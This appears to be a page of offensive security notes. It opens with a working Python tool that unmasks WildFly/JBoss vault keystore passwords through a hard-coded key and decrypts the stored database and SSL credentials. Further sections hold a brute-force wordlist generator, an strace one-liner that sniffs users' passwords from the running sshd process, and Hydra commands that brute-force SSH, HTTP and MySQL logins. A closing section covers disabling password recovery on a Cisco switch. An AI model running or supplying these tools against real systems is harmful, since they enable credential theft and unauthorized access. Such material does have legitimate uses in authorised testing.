
# Decrypt Wildfly/Jboss vault passwords


# cat standalone.xml
...
  <vault>  
      <vault-option name="KEYSTORE_URL" value="${user.home}/vault.store"/>  
      <vault-option name="KEYSTORE_PASSWORD" value="MASK-3y28rCZlcKR"/>  
      <vault-option name="KEYSTORE_ALIAS" value="vault"/>  
      <vault-option name="SALT" value="12438567"/>  
      <vault-option name="ITERATION_COUNT" value="50"/>  
      <vault-option name="ENC_FILE_DIR" value="${user.home}/vault.dat"/>  
    </vault> 
...

# cat vaultbreaker.py
import binascii
import hashlib
import string
import sys

import javaobj # pip install javaobj-py3
import jks # pip install pyjks
from Crypto.Cipher import AES, DES

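def clean(s):
    """Return *s* with every character outside ``string.printable`` removed and whitespace stripped.

    Used on raw decryption output, so trailing block-padding bytes disappear along
    with any other non-printable byte.  Note that this also silently drops non-ASCII
    characters, so a secret containing them is shown altered rather than verbatim.

    Args:
        s: Text (``str``) or raw bytes.  The original only handled Python 2 ``str``;
            ``filter`` returns an iterator on Python 3, which has no ``strip``.

    Returns:
        A ``str`` containing only printable characters.
    """
    if isinstance(s, bytes) and not isinstance(s, str):
        # Python 3 bytes: latin-1 maps every byte to exactly one code point, so the
        # printable filter below sees the same values the Python 2 version did.
        s = s.decode('latin-1')
    return ''.join(ch for ch in s if ch in string.printable).strip()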

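def get_derived_key(password, salt, count):
    """Derive the DES key and IV used to mask the keystore password (PBKDF1 with MD5).

    The digest of ``password + salt`` is re-hashed *count* times; the first 8 bytes
    become the DES key and the last 8 the CBC IV.  Because the password is a fixed
    constant and salt/iteration count are stored in the same config file, this
    masking is reversible by anyone who can read the config - it is obfuscation,
    not protection.

    Args:
        password: PBE password (``str`` or ``bytes``).
        salt: PBE salt (``str`` or ``bytes``), the SALT vault option.
        count: Number of MD5 iterations, the ITERATION_COUNT vault option.

    Returns:
        ``(key, iv)``, two 8-byte ``bytes`` values (for ``count == 0`` the
        unhashed concatenation is split instead).
    """
    # hashlib needs bytes on Python 3; Python 2 str already is bytes.
    if not isinstance(password, bytes):
        password = password.encode('utf-8')
    if not isinstance(salt, bytes):
        salt = salt.encode('utf-8')
    key = password + salt
    for _ in range(count):
        key = hashlib.md5(key).digest()
    return (key[:8], key[8:])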

def customb64decode(msg):
 alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./_'
 result = ''
 for i in range(0, len(msg), 4):
  p0 = alphabet.index(msg[i])
  p1 = alphabet.index(msg[i + 1])
  p2 = alphabet.index(msg[i + 2])
  p3 = alphabet.index(msg[i + 3])
  if p0 != 64:
   result += chr(((p1 & 0x30) >> 4) | (p0 << 2))
  if p1 != 64:
   result += chr(((p2 & 0x3c) >> 2) | ((p1 & 0xf) << 4))
  result += chr(((p2 & 3) << 6) | p3)
 return result

def decrypt_keystore_password(enc_keystore_password, password, salt, iteration_count):
    """Unmask the vault keystore password.

    Args:
        enc_keystore_password: The KEYSTORE_PASSWORD vault option WITHOUT its
            ``MASK-`` prefix (e.g. ``3y28rCZlcKR`` for ``MASK-3y28rCZlcKR``).
        password: The PBE password fed to the key derivation.
        salt: The SALT vault option.
        iteration_count: The ITERATION_COUNT vault option.

    Returns:
        The plaintext keystore password, with non-printable bytes (such as the
        block padding left by DES-CBC) removed by ``clean``.
    """
    # The custom base64 pads on the left with '_' up to a multiple of 4 symbols.
    missing = (-len(enc_keystore_password)) % 4
    padded = '_' * missing + enc_keystore_password
    cipher_text = customb64decode(padded)
    des_key, des_iv = get_derived_key(password, salt, iteration_count)
    cipher = DES.new(des_key, DES.MODE_CBC, des_iv)
    return clean(cipher.decrypt(cipher_text))

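def get_secret_key(keystore_filename, alias, keystore_password):
    """Return the raw key bytes of the secret-key entry stored under *alias*.

    Args:
        keystore_filename: Path to the vault keystore (the KEYSTORE_URL option).
        alias: The KEYSTORE_ALIAS vault option.
        keystore_password: The unmasked keystore password; pyjks loads the store
            with it, and the secret-key entries are only readable with it.

    Returns:
        The key bytes, or ``None`` when no secret-key entry has that alias.  The
        original returned the undefined name ``null`` here, which raised
        ``NameError`` instead of signalling the missing alias.
    """
    ks = jks.KeyStore.load(keystore_filename, keystore_password)
    entry = ks.secret_keys.get(alias)
    if entry is None:
        return None
    return entry.key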

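def decrypt_vault_passwords(vault_filename, secret_key):
    """Print every vault entry, decrypted with the keystore's secret key.

    Args:
        vault_filename: Path to the serialized vault (the ENC_FILE_DIR file).
        secret_key: Raw AES key bytes from the keystore's secret-key entry.

    The vault encrypts each value with AES in ECB mode, so one cipher object
    serves every entry; there is no IV to carry between them.
    """
    decryption_suite = AES.new(secret_key, AES.MODE_ECB)
    print('[+] Vault passwords =')
    # Java serialization is binary: read as bytes and close the file promptly
    # (the original left the handle open and used text mode).
    with open(vault_filename, 'rb') as fh:
        pobj = javaobj.loads(fh.read())
    # Presumably the vault map flattened into alternating key/value entries;
    # that is what the stride-2 walk relies on - verify against javaobj's output.
    entries = pobj.annotations[1].annotations
    for i in range(0, len(entries), 2):
        key = entries[i]
        value = entries[i + 1]
        if not key:
            continue
        # str() keeps the original Python 2 behaviour (str is bytes there);
        # NOTE(review): on Python 3 this may need bytes(value) instead - confirm.
        plain_text = decryption_suite.decrypt(str(value))
        print('\t - %s = %s' % (key, clean(plain_text)))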


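# This PBE password is not a secret: the vault implementation hard-codes this exact
# string, which is why the salt and iteration count from the config file are enough
# to unmask the keystore password.
passwd = "somearbitrarycrazystringthatdoesnotmatter"

# Usage: vaultbreaker.py MASKED_PASSWORD KEYSTORE_ALIAS SALT ITERATION_COUNT KEYSTORE_FILE VAULT_FILE
# MASKED_PASSWORD is the KEYSTORE_PASSWORD vault option without its "MASK-" prefix.
if len(sys.argv) != 7:
    sys.stderr.write('usage: %s MASKED_PASSWORD KEYSTORE_ALIAS SALT ITERATION_COUNT KEYSTORE_FILE VAULT_FILE\n'
                     % sys.argv[0])
    sys.exit(2)

KEYSTORE_PASSWORD = sys.argv[1]
KEYSTORE_ALIAS = sys.argv[2]
SALT = sys.argv[3]
ITERATION_COUNT = int(sys.argv[4])
keystore_filename = sys.argv[5]
vault_filename = sys.argv[6]

keystore_password = decrypt_keystore_password(KEYSTORE_PASSWORD, passwd, SALT, ITERATION_COUNT)
print('[+] Keystore password = ' + keystore_password)

secret_key = get_secret_key(keystore_filename, KEYSTORE_ALIAS, keystore_password)
if secret_key is None:
    sys.stderr.write('[-] No secret-key entry named %r in %s\n' % (KEYSTORE_ALIAS, keystore_filename))
    sys.exit(1)
# binascii.hexlify works on Python 2 and 3; str.encode('hex') is Python 2 only.
print('[+] Secretkey password = ' + binascii.hexlify(secret_key).decode('ascii'))

decrypt_vault_passwords(vault_filename, secret_key)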

# python vaultbreaker.py 3y28rCZlcKR vault 12438567 50 vault.store vault.dat
[+] Keystore password = vault22
[+] Secretkey password = 0e8f11aae5222d8280533a93bfaff4c3
[+] Vault passwords =
  - ssl::SSLUSER = ssl_user
  - datasource::HOST = 192.1.2.3
  - ssl::SSLPASS = ssl_pass
  - ssl::SSLALIAS = test
  - datasource::PORT = 1521
  - datasource::PASS = db_pass
  - datasource::SERVICENAME = db
  - datasource::USER = db_user

Reference

https://developer.jboss.org/wiki/JBossAS7SecuringPasswords

Done in collaboration with:

https://atorralba.github.io/

# Key generator


# cat keygen
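#!/bin/bash
# keygen LENGTH ALPHABET
# Print every string of LENGTH characters drawn from ALPHABET, where ALPHABET is a
# whitespace-separated word list that bash expands, e.g. "{a..z} {A..Z} {0..9}".
# The loop nest is built as text and evaluated by a child bash, so ALPHABET is code,
# not data: it must be a literal the caller controls.

length=$1
alphabet="$2"

# LENGTH is spliced into the generated loop nest; accept only a non-negative integer.
if ! [[ "$length" =~ ^[0-9]+$ ]]; then
        echo "usage: $0 LENGTH ALPHABET" >&2
        exit 2
fi

# Build "for p1 in ...; do for p2 in ...; do echo $p1$p2; done; done".
loops=""
for i in $(seq "$length"); do
        loops+="for p$i in $alphabet; do "
done
loops+="echo "
for i in $(seq "$length"); do
        loops+="\$p$i"
done
for i in $(seq "$length"); do
        loops+="; done"
done

# noglob keeps alphabet characters such as * or ? from matching files in the cwd.
/bin/bash -c "set -o noglob;$loops"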
# ./keygen 3 "{a..z} {A..Z} {0..9}"
aaa
aab
aac
aad
aae
...
995
996
997
998
999

# Getting passwords of all users


# strace -f -e "read" -p `ps axuf | grep -m 1 sshd | awk '{print $2}'` 2>&1 | grep -e '\\7\\0\\0\\0\\4' -e '\\v\\0\\0\\0\\10'

# Hydra: network password cracker

Introduction

Hydra
Default password list

Execution
# apt-get install libssh-dev
# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
# tar xvzf hydra-6.3-src.tar.gz
# cd hydra-6.3-src
# ./configure
# make
# ./hydra -h
# ./hydra -l foo -p bar -f 127.0.0.1 http-get -m /
# ./hydra -l root -P john_password.lst 127.0.0.1 ssh -s 2222
# ./hydra -l root 8:8:a -f 127.0.0.1 mysql

# No service password-recovery

Introduction

No service password-recovery

Execution
Switch(config)#no service password-recovery
c2960(config)#do wr
c2960(config)#do reload
Proceed with reload? [confirm]

...
The password-recovery mechanism is disabled.
Initializing Flash...
...
...done Initializing Flash.
...


The password-recovery mechanism has been triggered, but
is currently disabled.  Access to the boot loader prompt
through the password-recovery mechanism is disallowed at
this point.  However, if you agree to let the system be
reset back to the default system configuration, access
to the boot loader prompt can still be allowed.

Would you like to reset the system back to the default configuration (y/n)?y


The system has been interrupted, and the config file
has been deleted.  The following command will finish
loading the operating system software:

    boot


switch: boot
Loading "flash:c2960-lanbase-mz.122-35.SE5.bin"...
...
Would you like to terminate autoinstall? [yes]:
Would you like to enter the initial configuration dialog? [yes/no]: no
Switch>